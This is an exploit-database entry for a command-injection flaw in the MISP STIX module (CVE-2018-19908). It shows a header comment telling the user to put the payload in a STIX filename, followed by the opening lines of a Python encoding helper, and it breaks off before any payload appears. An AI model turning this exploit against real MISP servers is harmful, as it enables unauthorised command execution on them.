Misp 2.4.97 sql command execution via command injection in stix module Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-02-18 |
Type : webapps |
Platform : php
This exploit / vulnerability Misp 2.4.97 sql command execution via command injection in stix module is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#-*-coding:utf-8-*-
#
# Exploit Title: SQL command execution via command injection in STIX module
# Date: 2019-17-02
# Exploit Author: Tm9jdGlz
# Vendor Homepage: https://www.misp-project.org/
# Software link: https://www.misp-project.org/download/
# Version: 2.4.90 - 2.4.99
# Tested on: 2.4.97
# CVE: CVE-2018-19908
#
# Use this payload as stix filename
def encode_data(data):
from base64 import b64encode
from urllib.parse import quote_plus